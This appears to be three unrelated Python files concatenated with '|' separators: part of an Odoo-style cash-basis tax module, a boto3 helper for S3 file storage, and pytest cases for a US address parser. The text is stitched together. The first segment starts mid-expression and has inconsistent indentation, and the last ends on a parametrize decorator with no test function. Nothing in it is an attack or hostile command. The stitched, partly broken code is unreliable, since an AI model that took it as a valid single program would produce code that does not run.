'amount_currency': -cb_tax_line_vals['amount_currency'],
'currency_id': cb_tax_line_vals['currency_id'],
'partner_id': cb_tax_line_vals['partner_id'],
'tax_exigible': True,
}
@api.model
def _get_cash_basis_base_line_grouping_key_from_vals(self, base_line_vals):
''' Get the grouping key of a cash basis base line that hasn't yet been created.
:param base_line_vals: The values to create a new account.move.line record.
:return: The grouping key as a tuple.
'''
return (
base_line_vals['currency_id'],
base_line_vals['partner_id'],
base_line_vals['account_id'],
tuple(base_line_vals['tax_ids'][0][2]), # Decode [(6, 0, [...])] command
tuple(base_line_vals['tax_tag_ids'][0][2]), # Decode [(6, 0, [...])] command
)
@api.model
def _get_cash_basis_base_line_grouping_key_from_record(self, base_line, account=None):
''' Get the grouping key of a journal item being a base line.
:param base_line: An account.move.line record.
:param account: Optional account to shadow the current base_line one.
:return: The grouping key as a tuple.
'''
return (
base_line.currency_id.id,
base_line.partner_id.id,
(account or base_line.account_id).id,
tuple(base_line.tax_ids.ids),
tuple(base_line._convert_tags_for_cash_basis(base_line.tax_tag_ids).ids),
)
@api.model
def _get_cash_basis_tax_line_grouping_key_from_vals(self, tax_line_vals):
''' Get the grouping key of a cash basis tax line that hasn't yet been created.
:param tax_line_vals: The values to create a new account.move.line record.
:return: The grouping key as a tuple.
'''
return (
tax_line_vals['currency_id'],
tax_line_vals['partner_id'],
tax_line_vals['account_id'],
tuple(tax_line_vals['tax_ids'][0][2]), # Decode [(6, 0, [...])] command
tuple(tax_line_vals['tax_tag_ids'][0][2]), # Decode [(6, 0, [...])] command
tax_line_vals['tax_repartition_line_id'],
)
@api.model
def _get_cash_basis_tax_line_grouping_key_from_record(self, tax_line, account=None):
''' Get the grouping key of a journal item being a tax line.
:param tax_line: An account.move.line record.
:param account: Optional account to shadow the current tax_line one.
:return: The grouping key as a tuple.
'''
return (
tax_line.currency_id.id,
tax_line.partner_id.id,
(account or tax_line.account_id).id,
tuple(tax_line.tax_ids.ids),
tuple(tax_line._convert_tags_for_cash_basis(tax_line.tax_tag_ids).ids),
tax_line.tax_repartition_line_id.id,
)
    @api.model
    def _fix_cash_basis_full_balance_coverage(self, move_values, partial_values, pending_cash_basis_lines, partial_lines_to_create):
        ''' Ensure the full coverage of the current move when it becomes fully paid.

        Example: a line of 0.03 paid 50/50. Without this method, each cash
        basis entry would report round(0.03 * 0.5) = 0.02 as base amount,
        i.e. 0.04 in total on the tax report, while 0.03 is expected.

        :param move_values: The collected values about cash basis for the current move.
        :param partial_values: The collected values about cash basis for the current partial.
        :param pending_cash_basis_lines: The previously generated lines during this reconciliation but not yet created.
        :param partial_lines_to_create: The generated lines for the current and last partial making the move fully paid.
        '''
        # DEPRECATED: TO BE REMOVED IN MASTER
        residual_amount_per_group = {}
        move = move_values['move']

        # ==========================================================================
        # Part 1:
        # Add the balance of all journal items that are not tax exigible in order to
        # ensure the exact balance will be report on the Tax Report.
        # This part is needed when the move will be fully paid after the current
        # reconciliation.
        # ==========================================================================

        for line in move_values['to_process_lines']:

            if line.tax_repartition_line_id:
                # Tax line.
                grouping_key = self._get_cash_basis_tax_line_grouping_key_from_record(
                    line,
                    account=line.tax_repartition_line_id.account_id,
                )
                residual_amount_per_group.setdefault(grouping_key, 0.0)
                residual_amount_per_group[grouping_key] += line['amount_currency']

            elif line.tax_ids:
                # Base line.
                grouping_key = self._get_cash_basis_base_line_grouping_key_from_record(
                    line,
                    account=line.company_id.account_cash_basis_base_account_id,
                )
                residual_amount_per_group.setdefault(grouping_key, 0.0)
                residual_amount_per_group[grouping_key] += line['amount_currency']

        # ==========================================================================
        # Part 2:
        # Subtract all previously created cash basis journal items during previous
        # reconciliation.
        # ==========================================================================

        previous_tax_cash_basis_moves = self.env['account.move'].search([
            '|',
            ('tax_cash_basis_rec_id', 'in', self.ids),
            ('tax_cash_basis_move_id', '=', move.id),
        ])
        for line in previous_tax_cash_basis_moves.line_ids:
            if line.tax_repartition_line_id:
                # Tax line.
                grouping_key = self._get_cash_basis_tax_line_grouping_key_from_record(line)
            elif line.tax_ids:
                # Base line.
                grouping_key = self._get_cash_basis_base_line_grouping_key_from_record(line)
            else:
                continue

            if grouping_key not in residual_amount_per_group:
                # The grouping_key is unknown regarding the current lines.
                # Maybe this move has been created before migration and then,
                # we are not able to ensure the full coverage of the balance.
                return

            residual_amount_per_group[grouping_key] -= line['amount_currency']

        # ==========================================================================
        # Part 3:
        # Subtract all pending cash basis journal items that will be created during
        # this reconciliation.
        # ==========================================================================

        for grouping_key, balance in pending_cash_basis_lines:
            residual_amount_per_group[grouping_key] -= balance

        # ==========================================================================
        # Part 4:
        # Fix the current cash basis journal items in progress by replacing the
        # balance by the residual one.
        # ==========================================================================

        for grouping_key, aggregated_vals in partial_lines_to_create.items():
            line_vals = aggregated_vals['vals']
            amount_currency = residual_amount_per_group[grouping_key]
            # Convert back to company currency using the partial's rate; a
            # zero rate yields a zero balance.
            balance = partial_values['payment_rate'] and amount_currency / partial_values['payment_rate'] or 0.0
            line_vals.update({
                'debit': balance if balance > 0.0 else 0.0,
                'credit': -balance if balance < 0.0 else 0.0,
                'amount_currency': amount_currency,
            })
def _create_tax_cash_basis_moves(self):
    ''' Create the tax cash basis journal entries.

    For every reconciled move, one cash basis entry is created per partial
    reconciliation: each base/tax line of the origin move is mirrored in
    proportion to the amount paid by that partial, together with a
    counterpart line. Mirror lines are grouped by a grouping key to limit
    the number of generated journal items and to avoid rounding drift.

    :return: The newly created journal entries (account.move recordset).
    '''
    tax_cash_basis_values_per_move = self._collect_tax_cash_basis_values()
    moves_to_create = []
    # (tax_line, index into moves_to_create, sequence of the counterpart line)
    # collected so the transfer-account tax lines can be reconciled after posting.
    to_reconcile_after = []
    for move_values in tax_cash_basis_values_per_move.values():
        move = move_values['move']
        # (grouping_key, amount_currency) pairs for lines about to be created.
        # NOTE(review): only appended to here; presumably consumed by the
        # residual-fixing helper defined elsewhere in this file — confirm.
        pending_cash_basis_lines = []
        for partial_values in move_values['partials']:
            partial = partial_values['partial']
            # Init the journal entry.
            move_vals = {
                'move_type': 'entry',
                'date': partial.max_date,
                'ref': move.name,
                'journal_id': partial.company_id.tax_cash_basis_journal_id.id,
                'line_ids': [],
                'tax_cash_basis_rec_id': partial.id,
                'tax_cash_basis_move_id': move.id,
            }
            # Tracking of lines grouped all together.
            # Used to reduce the number of generated lines and to avoid rounding issues.
            partial_lines_to_create = {}
            for line in move_values['to_process_lines']:
                # ==========================================================================
                # Compute the balance of the current line on the cash basis entry.
                # This balance is a percentage representing the part of the journal entry
                # that is actually paid by the current partial.
                # ==========================================================================
                # Percentage expressed in the foreign currency.
                amount_currency = line.currency_id.round(line.amount_currency * partial_values['percentage'])
                # `payment_rate` of zero would divide by zero; the and/or idiom
                # falls back to 0.0 in that case.
                balance = partial_values['payment_rate'] and amount_currency / partial_values['payment_rate'] or 0.0
                # ==========================================================================
                # Prepare the mirror cash basis journal item of the current line.
                # Group them all together as much as possible to reduce the number of
                # generated journal items.
                # Also track the computed balance in order to avoid rounding issues when
                # the journal entry will be fully paid. At that case, we expect the exact
                # amount of each line has been covered by the cash basis journal entries
                # and well reported in the Tax Report.
                # ==========================================================================
                if line.tax_repartition_line_id:
                    # Tax line.
                    cb_line_vals = self._prepare_cash_basis_tax_line_vals(line, balance, amount_currency)
                    grouping_key = self._get_cash_basis_tax_line_grouping_key_from_vals(cb_line_vals)
                elif line.tax_ids:
                    # Base line.
                    cb_line_vals = self._prepare_cash_basis_base_line_vals(line, balance, amount_currency)
                    grouping_key = self._get_cash_basis_base_line_grouping_key_from_vals(cb_line_vals)
                if grouping_key in partial_lines_to_create:
                    # Accumulate amounts on the already-prepared vals for this group.
                    aggregated_vals = partial_lines_to_create[grouping_key]['vals']
                    aggregated_vals.update({
                        'debit': aggregated_vals['debit'] + cb_line_vals['debit'],
                        'credit': aggregated_vals['credit'] + cb_line_vals['credit'],
                        'amount_currency': aggregated_vals['amount_currency'] + cb_line_vals['amount_currency'],
                    })
                    if line.tax_repartition_line_id:
                        aggregated_vals.update({
                            'tax_base_amount': aggregated_vals['tax_base_amount'] + cb_line_vals['tax_base_amount'],
                        })
                        partial_lines_to_create[grouping_key]['tax_line'] += line
                else:
                    partial_lines_to_create[grouping_key] = {
                        'vals': cb_line_vals,
                    }
                    if line.tax_repartition_line_id:
                        partial_lines_to_create[grouping_key].update({
                            'tax_line': line,
                        })
            # ==========================================================================
            # Create the counterpart journal items.
            # ==========================================================================
            # To be able to retrieve the correct matching between the tax lines to reconcile
            # later, the lines will be created using a specific sequence.
            sequence = 0
            for grouping_key, aggregated_vals in partial_lines_to_create.items():
                line_vals = aggregated_vals['vals']
                line_vals['sequence'] = sequence
                pending_cash_basis_lines.append((grouping_key, line_vals['amount_currency']))
                if 'tax_repartition_line_id' in line_vals:
                    # Tax line.
                    tax_line = aggregated_vals['tax_line']
                    counterpart_line_vals = self._prepare_cash_basis_counterpart_tax_line_vals(tax_line, line_vals)
                    counterpart_line_vals['sequence'] = sequence + 1
                    if tax_line.account_id.reconcile:
                        # Remember this pair: the original tax line must be
                        # reconciled with the counterpart after posting.
                        move_index = len(moves_to_create)
                        to_reconcile_after.append((tax_line, move_index, counterpart_line_vals['sequence']))
                else:
                    # Base line.
                    counterpart_line_vals = self._prepare_cash_basis_counterpart_base_line_vals(line_vals)
                    counterpart_line_vals['sequence'] = sequence + 1
                # Each group produces exactly two lines (mirror + counterpart).
                sequence += 2
                move_vals['line_ids'] += [(0, 0, counterpart_line_vals), (0, 0, line_vals)]
            moves_to_create.append(move_vals)
    moves = self.env['account.move'].create(moves_to_create)
    moves._post(soft=False)
    # Reconcile the tax lines being on a reconcile tax basis transfer account.
    for line, move_index, sequence in to_reconcile_after:
        counterpart_line = moves[move_index].line_ids.filtered(lambda line: line.sequence == sequence)
        # When dealing with tiny amounts, the line could have a zero amount and then, be already reconciled.
        if counterpart_line.reconciled:
            continue
        (line + counterpart_line).reconcile()
    return moves
|
import os
import time
import json
import boto3
from botocore.client import Config
import botocore
from config import config
from db import db
# NOTE(review): this rebinding shadows the imported `db` module with a Database
# instance; later references to `db` mean the instance, not the module.
db = db.Database()
env = config.GetEnvObj()
# Credentials/config: prefer the project env object, fall back to process env vars.
PBOX_AWS_KEY = env("PBOX_AWS_KEY") if env("PBOX_AWS_KEY") else os.getenv("PBOX_AWS_KEY", None)
PBOX_AWS_SECRET = env("PBOX_AWS_SECRET") if env("PBOX_AWS_SECRET") else os.getenv("PBOX_AWS_SECRET", None)
PBOX_BUCKET = env("PBOX_BUCKET") if env("PBOX_BUCKET") else os.getenv("PBOX_BUCKET", None)
PBOX_REGION = env("PBOX_REGION") if env("PBOX_REGION") else os.getenv("PBOX_REGION", None)
PBOX_S3_URL = env("PBOX_S3_URL") if env("PBOX_S3_URL") else os.getenv("PBOX_S3_URL", None)
# Initialize a session using DigitalOcean Spaces.
session = boto3.Session(aws_access_key_id=PBOX_AWS_KEY, aws_secret_access_key=PBOX_AWS_SECRET)
# Low-level client (used for list/put/delete calls below).
client = session.client('s3',
                        region_name=PBOX_REGION,
                        endpoint_url=PBOX_S3_URL,
                        aws_access_key_id=PBOX_AWS_KEY,
                        aws_secret_access_key=PBOX_AWS_SECRET)
# High-level resource + bucket handle (used for object-level operations).
s3_obj = session.resource('s3')
s3_bucket = s3_obj.Bucket(PBOX_BUCKET)
def list_all_s3_data(username):
    """Print every object summary in the pbox bucket.

    NOTE(review): `username` is currently unused — per-user prefix filtering
    is not implemented yet; confirm intent before relying on it.
    """
    bucket = s3_obj.Bucket(PBOX_BUCKET)
    for object_summary in bucket.objects.all():
        print(object_summary)
def get_all_versions(bucket, filename):
    """Collect all version ids (including delete markers) of *filename*.

    :param bucket: str, bucket name to query
    :param filename: str, exact object key to match
    :return: list of version-id strings; empty when nothing matches or on error
    """
    results = []
    # FIX: the original did `results = to_delete = []`, aliasing both names to
    # the same list, and reused a stale `to_delete` from the previous
    # iteration; accumulate directly into `results` instead.
    for section in ("Versions", "DeleteMarkers"):
        try:
            entries = client.list_object_versions(Bucket=bucket)[section]
            print(entries)
            results.extend(e["VersionId"] for e in entries if e["Key"] == filename)
        except Exception as e:
            # KeyError when the section is absent; botocore errors otherwise.
            print(str(e))
    return results
def delete_file_s3(key, filename):
    """Delete a single object from the pbox bucket.

    :param key: str, full object key to delete
    :param filename: unused; kept for backward compatibility with callers
        (the original version-aware deletion path was disabled)
    :return: the boto3 delete response dict
    """
    # Dead commented-out version-deletion code removed; see get_all_versions
    # if per-version deletion is ever needed again.
    resp = s3_obj.Object(PBOX_BUCKET, key).delete()
    print(resp)
    return resp
def download_file(key, filename):
    """Fetch an object and build HTTP download headers for it.

    :param key: str, object key in the pbox bucket
    :param filename: str, name advertised in the Content-Disposition header
    :return: (body bytes, headers dict), or (None, None) when the response
        carries no HTTP header metadata
    """
    obj = s3_obj.Object(PBOX_BUCKET, key)
    resp = obj.get()
    print(resp)
    if resp and ("HTTPHeaders" in resp["ResponseMetadata"]):
        http_headers = resp["ResponseMetadata"]["HTTPHeaders"]
        headers = {
            "content-disposition": "attachment;filename=" + filename,
            "content-type": http_headers["content-type"],
            "content-length": http_headers["content-length"],
        }
        return resp["Body"].read(), headers
    return None, None
def list_all_data(user):
    """Print every object in the pbox bucket (first page only, max 1000 keys).

    :param user: currently unused — the Prefix filter that would scope the
        listing to one user is disabled; confirm before re-enabling.
    """
    print(PBOX_BUCKET)
    # FIX: removed the unused `prefix` local (it only fed the disabled Prefix
    # argument) and the dead commented-out pagination/deletion code.
    response = client.list_objects_v2(Bucket=PBOX_BUCKET)
    if 'Contents' in response:
        for item in response['Contents']:
            print(item)
def save_to_s3(data, username, filename, description):
    """Upload *data* under ``<username>/<filename>`` and record metadata in the DB.

    :param data: bytes/file-like body to store
    :param username: str, key prefix (per-user folder) in the bucket
    :param filename: str, object name inside the user's folder
    :param description: str, free-text description stored alongside the upload
    :return: (boto3 put_object response, True) on success,
             (error message string, False) on failure
    """
    # BUG FIX: the key previously ended in a literal placeholder instead of
    # the uploaded file's name, so every upload by a user hit the same object
    # and the `filekey` recorded below never matched the real S3 key.
    filepath = f"{username}/{filename}"
    print(filepath)
    try:
        start = time.time()
        resp = client.put_object(Bucket=PBOX_BUCKET, Body=data, Key=filepath)
        end = time.time()
        body = {
            "username": username,
            "firstname": username,
            "lastname": username,
            "uploadTime": str(end - start),
            "description": description,
            "filekey": "pbox-storage/" + username + "/" + filename
        }
        db.insert(body)
        return resp, True
    except Exception as e:
        print(f"S3 upload error: {str(e)}")
        return str(e), False
# def s3_delete_all_file(folder):
# bucket = s3.Bucket('aniketbucketpython')
# d = f"{folder}/"
# for obj in bucket.objects.filter(Prefix=f):
# s3.Object(bucket.name,obj.key).delete()
def get_objects_in_folder(folderpath, bucket='hackers'):
    """List all objects under the provided key prefix.

    :param folderpath: str, key prefix to filter on
    :param bucket: str, bucket to query; default kept for backward
        compatibility with the previously hard-coded value
    :return: the raw list_objects_v2 response dict (single page, max 1000 keys)
    """
    # NOTE(review): passing empty ContinuationToken/StartAfter strings looks
    # dubious — S3 may reject an empty continuation token; confirm against the
    # endpoint in use and drop the unused parameters if so.
    objects = client.list_objects_v2(
        Bucket=bucket,
        EncodingType='url',
        MaxKeys=1000,
        Prefix=folderpath,
        ContinuationToken='',
        FetchOwner=False,
        StartAfter=''
    )
    return objects
|
# -*- coding: utf-8 -*-
""" Test for USA address parser """
import re
import pytest
from pyap import utils
from pyap.packages import six
import pyap.source_US.data as data_us
def execute_matching_test(input, expected, pattern):
    """Assert that *pattern* fully matches *input* iff *expected* is True.

    Positive cases require the regex to consume the whole string. Negative
    cases accept either no match at all, or a merely partial match (the
    regex must not consume the entire input).
    """
    match = utils.match(pattern, input, re.VERBOSE)
    if expected:
        assert match is not None and match.group(0) == input
    else:
        assert match is None or match.group(0) != input
# NOTE: these word patterns require a trailing space (compare "one " vs "One").
@pytest.mark.parametrize("input,expected", [
    # positive assertions
    ("ZERO ", True),
    ("one ", True),
    ("two ", True),
    ("Three ", True),
    ("FoUr ", True),
    ("FivE ", True),
    ("six ", True),
    ("SEvEn ", True),
    ("Eight ", True),
    ("Nine ", True),
    # negative assertions
    ("Nidnes", False),
    ("One", False),
    ("two", False),
    ("onetwothree ", False),
])
def test_zero_to_nine(input, expected):
    ''' test string match for zero_to_nine '''
    execute_matching_test(input, expected, data_us.zero_to_nine)
@pytest.mark.parametrize("input,expected", [
    # positive assertions
    ("tEN ", True),
    ("TWENTY ", True),
    ("tHirtY ", True),
    ("FOUrty ", True),
    ("fifty ", True),
    ("sixty ", True),
    ("seventy ", True),
    ("eighty ", True),
    ("NINety ", True),
    # negative assertions
    ("ten", False),
    ("twenTY", False),
    ("sixtysixsty ", False),
    ("one twenty ", False),
])
def test_ten_to_ninety(input, expected):
    ''' test string match for ten_to_ninety '''
    execute_matching_test(input, expected, data_us.ten_to_ninety)
@pytest.mark.parametrize("input,expected", [
    # positive assertions
    ("Hundred ", True),
    ("HuNdred ", True),
    # negative assertions
    ("HuNDdred", False),
    ("HuNDdred hundred ", False),
])
def test_hundred(input, expected):
    ''' tests string match for a hundred '''
    execute_matching_test(input, expected, data_us.hundred)
@pytest.mark.parametrize("input,expected", [
    # positive assertions
    ("Thousand ", True),
    ("thOUSAnd ", True),
    # negative assertions
    ("thousand", False),
    ("THoussand ", False),
    ("THoussand", False),
    ("THOUssand THoussand ", False),
])
def test_thousand(input, expected):
    ''' tests string match for a thousand '''
    execute_matching_test(input, expected, data_us.thousand)
@pytest.mark.parametrize("input,expected", [
    # positive assertions (words)
    ("One Thousand And Fifty Nine ", True),
    ("Two hundred and fifty ", True),
    ("Three hundred four ", True),
    ("Thirty seven ", True),
    ("FIFTY One ", True),
    ("Three hundred Ten ", True),
    # positive assertions (numbers)
    ("1 ", True),
    ("15 ", True),
    ("44 ", True),
    ("256 ", True),
    ("256 ", True),
    ("1256 ", True),
    ("32457 ", True),
    # negative assertions (words)
    ("ONE THousszz22and FIFTY and four onde", False),
    ("ONE one oNe and onE Three", False),
    # negative assertions (numbers): numeric street numbers max out at 5 digits
    ("536233", False),
    ("111111", False),
    ("1111ss11", False),
    ("123 456", False),
])
def test_street_number(input, expected):
    ''' tests string match for a street number '''
    execute_matching_test(input, expected, data_us.street_number)
@pytest.mark.parametrize("input,expected", [
    # positive assertions
    ("Northeast Kentucky Industrial ", True),
    ("One ", True),
    ("First ", True),
    ("Ave 123 ", True),
    ("Northeast 5 ", True),
    # negative assertions
    ("Northeast Kentucky Industrial Maple ", False),
    ("a", False),
    ("ab", False),
])
def test_street_name(input, expected):
    ''' tests positive string match for a street name '''
    execute_matching_test(input, expected, data_us.street_name)
@pytest.mark.parametrize("input,expected", [
    # positive assertions
    ("N. ", True),
    ("N ", True),
    ("S ", True),
    ("West ", True),
    ("eASt ", True),
    ("NW ", True),
    ("SE ", True),
    # negative assertions: abbreviated compounds must not take a period
    ("NW.", False),
    ("NW. ", False),
    ("NS ", False),
    ("EW ", False),
])
def test_post_direction(input, expected):
    ''' tests string match for a post_direction '''
    execute_matching_test(input, expected, data_us.post_direction)
@pytest.mark.parametrize("input,expected", [
    # positive assertions
    ("Street ", True),
    ("St. ", True),
    ("St.", True),
    ("Blvd.", True),
    ("Blvd. ", True),
    ("LN ", True),
    ("RD", True),
    ("Cir", True),
    ("Highway ", True),
    ("Hwy ", True),
    ("Ct", True),
    ("Sq.", True),
    ("LP. ", True),
    ("LP. (Route A1 )", True),
    ("Street route 5 ", True),
    ("blvd", True),
    ("Estate", True),
    ("Manor", True),
    # negative assertions
    # TODO
])
def test_street_type(input, expected):
    ''' tests string match for a street id '''
    execute_matching_test(input, expected, data_us.street_type)
@pytest.mark.parametrize("input,expected", [
    # positive assertions
    ("floor 3 ", True),
    ("floor 11 ", True),
    ("floor 15 ", True),
    ("1st floor ", True),
    ("2nd floor ", True),
    ("15th floor ", True),
    ("16th. floor ", True),
    # negative assertions: a space between ordinal and "floor" is required
    ("16th.floor ", False),
    ("1stfloor ", False),
])
def test_floor(input, expected):
    ''' tests string match for a floor '''
    execute_matching_test(input, expected, data_us.floor)
@pytest.mark.parametrize("input,expected", [
    # positive assertions
    ("bldg m ", True),
    ("Building F ", True),
    ("bldg 2 ", True),
    ("building 3 ", True),
    ("building 100 ", True),
    ("building 1000 ", True),
    ("Building ", True),
    ("building one ", True),
    ("Building three ", True),
    # negative assertions: identifiers are limited (max 4 digits, space required)
    ("bldg", False),
    ("bldgm", False),
    ("bldg100 ", False),
    ("building 10000 ", False),
])
def test_building(input, expected):
    ''' tests string match for a building '''
    execute_matching_test(input, expected, data_us.building)
@pytest.mark.parametrize("input,expected", [
    # positive assertions
    ("suite 900 ", True),
    ("Suite #2 ", True),
    ("suite #218 ", True),
    ("suite J7 ", True),
    ("suite 102A ", True),
    ("suite a&b ", True),
    ("Suite J#200 ", True),
    ("suite 710-327 ", True),
    ("Suite A ", True),
    ("ste A ", True),
    ("Ste 101 ", True),
    ("ste 502b ", True),
    ("ste 14-15 ", True),
    ("ste E ", True),
    ("ste 9E ", True),
    ("Suite 1800 ", True),
    ("Apt 1B ", True),
    ("Rm. 52 ", True),
    ("#2b ", True),
    # negative assertions (no space between keyword and identifier)
    ("suite900 ", False),
    ("Suite#2", False),
    ("suite218 ", False),
])
def test_occupancy(input, expected):
    ''' tests string match for a place id '''
    execute_matching_test(input, expected, data_us.occupancy)
@pytest.mark.parametrize("input,expected", [
    # positive assertions
    ("po box 108", True),
    ("Po Box 53485", True),
    ("P.O. box 119", True),
    ("PO box 1070", True),
    # negative assertions
    ("po box108 ", False),
    ("PoBox53485 ", False),
    ("P.O. box119", False),
    ("POb ox1070 ", False),
])
def test_po_box_positive(input, expected):
    ''' tests exact string match for a po box '''
    execute_matching_test(input, expected, data_us.po_box)
# NOTE: "<NAME>" entries below are anonymization placeholders from the
# upstream dataset, kept verbatim.
@pytest.mark.parametrize("input,expected", [
    # positive assertions
    ("9652 Lo<NAME>", True),
    ("101 <NAME>", True),
    ("1 West Hegeler Lane", True),
    ("1270 Leeds Avenue", True),
    ("85-1190 Ranchview Rd. NW ", True),
    ("62 Portland Road (Route 1)", True),
    ("200 N. Pine Avenue Suite 514", True),
    ("200 S. Alloy Drive", True),
    ("Two Hundred S. Alloy Drive", True),
    ("Two Hundred South Alloy Drive", True),
    ("Two Hundred South Alloy Dr.", True),
    ("11001 Fondren Rd,", True),
    ("9606 North Mopac Expressway Suite 500", True),
    ("9692 East Arapahoe Road,", True),
    ("9 Grand Avenue, Suite 2", True),
    ("9 Grand Avenue Building 2, Suite 2", True),
    ("9 Grand Avenue Building 2, Suite 2A", True),
    ("233 Richmond Highway Suite 1800", True),
    ("354 Eisenhower Parkway P.O. Box 472", True),
    ("6645 N Ensign St", True),
    ("1200 Old Fairhaven Pkwy Apt 106", True),
    ("1659 Scott Blvd Ste 26", True),
    ("377 Fisher Rd Ste C", True),
    ("1833 Stearman Ave", True),
    ("1737 S Lumpkin St Ste B", True),
    ("101 N Court Sq Ste 16", True),
    ("1790 Y<NAME> Rd, Suite #205", True),
    ("280 West Main Street", True),
    ("701 Tennessee Walk", True),
    ("7457 Harwin Dr", True),
    ("700 Davis Avenue", True),
    ("1 W 47th St", True),
    ("832 Seward St", True),
    ("2740 Timber Ridge Lane", True),
    ("810 E Western Ave", True),
    ("6223 Richmond Ave Ste 105", True),
    ("400 Middle Street", True),
    ("81 N Main St", True),
    ("3705 West Memorial Road", True),
    ("4911 Matterhorn Dr", True),
    ("5830 Yahl Street, #2b", True),
    ("9400 Doliver Dr Apt 13", True),
    ("10701 Stirling Road", True),
    ("1865 Corporate Dr Ste 225", True),
    ("80 Beaman Rd", True),
    ("9691 Spratley Ave", True),
    ("10835 New Haven Rd NW ", True),
    ("320 W Broussard Rd", True),
    ("9001 Any Old Way", True),
    ("8967 Market St.", True),
    ("3724 Oxford Blvd.", True),
    ("901 Rainier Ave S ", True),
])
def test_full_street_positive(input, expected):
    ''' tests exact string match for a full street '''
    execute_matching_test(input, expected, data_us.full_street)
# End-to-end cases: street + city + region (+ optional zip/country). The
# negative cases are product/free-text strings that merely resemble addresses.
@pytest.mark.parametrize("input,expected", [
    # positive assertions
    ("0 OLD MILL RD, Maynard, MA 01754", True),
    ("103 Morgan Lane, Suite 102 Plainsboro, NJ 08536", True),
    ("3409 16th St Metairie, LA 70002", True),
    ("1505 NW 14th Street Miami, FL 33125", True),
    ("01 Main Rd. Newfield, NJ", True),
    ("28 Gorgo Lane Newfield, NJ", True),
    ("1720 HARDING HWY NEWFIELD, NJ", True),
    ("4409 N DELSEA DR NEWFIELD, NJ", True),
    ("742 FORSYTHIA DR NEWFIELD, NJ", True),
    ("9 N EAST BLVD NEWFIELD, NJ 10000", True),
    ("1640 Harding Hwy Newfield, NJ", True),
    ("1720 Harding Highway NEWFIELD, NJ", True),
    ("1014 CATAWBA AVE NEWFIELD, NJ", True),
    ("11 ARCH AVE NEWFIELD, NJ", True),
    ("133 TAYLOR RD NEWFIELD, NJ", True),
    ("4409 N Delsea Drive Newfield, NJ", True),
    ("8 TAYLOR RD NEWFIELD, NJ", True),
    ("28 GORGO LN NEWFIELD, NJ", True),
    ("900 COLUMBIA AVE. NEWFIELD, NJ", True),
    ("3201 MAIN RD NEWFIELD, NJ", True),
    ("4421 N DELSEA DR NEWFIELD, NJ", True),
    ("742 Forsythia Drive Newfield, NJ", True),
    ("1450 E. Chestnut Avenue, Vineland NJ,", True),
    ("50 Harry S Truman Parkway Annapolis, MD 21401", True),
    ("420 Crompton Street Charlotte , North Carolina 28273", True),
    ("204 East 3rd Ave Cheyenne, WY 82001", True),
    ("1806 Dominion Way Ste B Colorado Spgs, CO 80918-8409", True),
    ("2600 South Shore Blvd Ste. 300 League City, TX 77573", True),
    ("2675 Antler Drive Carson City, NV 89701-1451", True),
    ("3719 Lockwood Dr., Houston, TX 77026", True),
    ("154 Grand Street New York, NY 10013", True),
    ("3655 Torrance Blvd Suite 230 Torrance CA 90503", True),
    ("800 Sixth Ave #31A New York, NY 10001", True),
    ("8861 Research Drive, Ste. 200, Irvine, CA 92618", True),
    ("317 N. Mission St. Ste. 200 Wenatchee, WA 98801", True),
    ("2709 Bickford Avenue, Suite A Snohomish, WA 98290", True),
    ("7307 N. Division Street, Suite 102 Spokane, WA 99208", True),
    ("1530 South Union Avenue, Suite 7 Tacoma, WA 98405", True),
    ("3131 Smokey Point Drive, Suite 14 A Arlington, WA 98223", True),
    ("1603 Grove Street Marysville, WA 98270", True),
    ("15701 E. Sprague Avenue, Suite F Spokane Valley, WA 99037", True),
    ("18204 Bothell Everett Hwy, Suite E Bothell, WA 98012", True),
    ("3505 188th Street SW Lynnwood, WA 98037", True),
    ("3218 NE 12th Street, Suite B Renton, WA 98056", True),
    ("22035 SE Wax Road, Suite 5 Maple Valley, WA 98038", True),
    ("8861 Research Drive, Ste. 200 Irvine, CA 92618", True),
    ("4031 University Drive Suite 200 Fairfax, Virginia 22030", True),
    ("586 W. 207 St. New York, NY 10034", True),
    ("85 Newbury St, Boston, MA 02116", True),
    ("1827 Union St, San Francisco, CA 94123", True),
    ("1636 Main St Sarasota, FL 34236", True),
    ("1015 South Western Avenue, Chicago, IL 60649", True),
    ("510 W 7th St. Los Angeles, CA 90014", True),
    ("225 North Larchmont Blvd Los Angeles, CA 90004", True),
    ("3760 E. Tremont Ave. Throgsneck, NY 10465", True),
    ("8126 S. Stony Island Ave Chicago, IL 60617", True),
    ("68116 HEM 908 B WEST 12th St. Austin, TX 78703", True),
    ("546 West Colorado Street Glendale CA 91204", True),
    ("2210 N Halsted St, Chicago, IL 60614", True),
    ("4090 Westown Pkwy Ste B2 Chicago, IL 60614", True),
    ("7000 Peachtree Dunwoody Rd NE Bldg 7, Miami, FL, USA", True),
    ("98-025 Hekaha St Ste 221A, Cityville, Arizona", True),
    ("225 <NAME>, Suite 1500 Irving, Texas 75062 U.S.A.", True),
    ("643 Lincoln Rd. Miami Beach, FL 33139", True),
    ("300 Market St. Harrisburg, PA 17101", True),
    ("2 Kings Hwy Shreveport, LA 71104", True),
    ("1500 Westlake Avenue North Suite 108 Seattle, WA 98109", True),
    ("840 Garrison Brooks Suite 985, New Sarah, OH 38255", True),
    ("840 Garrison Brooks Suite 985 New Sarah, OH 38255", True),
    # negative assertions
    ("85 STEEL REGULAR SHAFT - NE", False),
    ("3 STRUCTURE WITH PE", False),
    ("2013 Courtesy of <NAME>, PR", False),
    ("44 sq. ft. 000 Columbia Ave. See Remarks, Newfield, NJ 08344", False),
    ("7901 SILVER CONDUCTIVE HOLE FILL MA", False),
    ("3 THIRD PARTY LIST IN", False),
    ("9 STORAGE OF INDIVIDUAL IN", False),
    ("4 BODY WAVE MODEL MO", False),
    ("4060 AUTOMATIC STRAPPING MACHINE KZB-II STRAPPING MA", False),
    ("130 AUTOMATIC STRAPPING MACHINE CO", False),
    ("6060 AUTOMATIC STRAPPING MACHINE SK", False),
    ("500 AUTO BLISTER PACKING SEALING MA", False),
    ("23 ELECTRICAL COLOURED-TAPE PR", False),
    ("1900 TRANSISTOR ELECTROMAGNETIC INDUCTION AL", False),
    ("3131 DR. MATTHEW WI", False),
    ("ONE FOR ANY DIRECT, INDIRECT, IN", False),
    ("2 TRACTOR HEAD Actros MP", False),
    ("00 Straight Fit Jean, USA", False),
])
def test_full_address(input, expected):
    ''' tests exact string match for a full address '''
    execute_matching_test(input, expected, data_us.full_address)
@pytest.mark.parametrize("input,expected", [
    # positive assertions: 5-digit ZIP or ZIP+4
    ("75062", True),
    ("15032", True),
    ("95130-6482", True),
    # negative assertions
    ("1", False),
    ("23", False),
    ("456", False),
    ("4567", False),
    ("750621", False),
    ("95130-642", False),
    ("95130-64212", False),
])
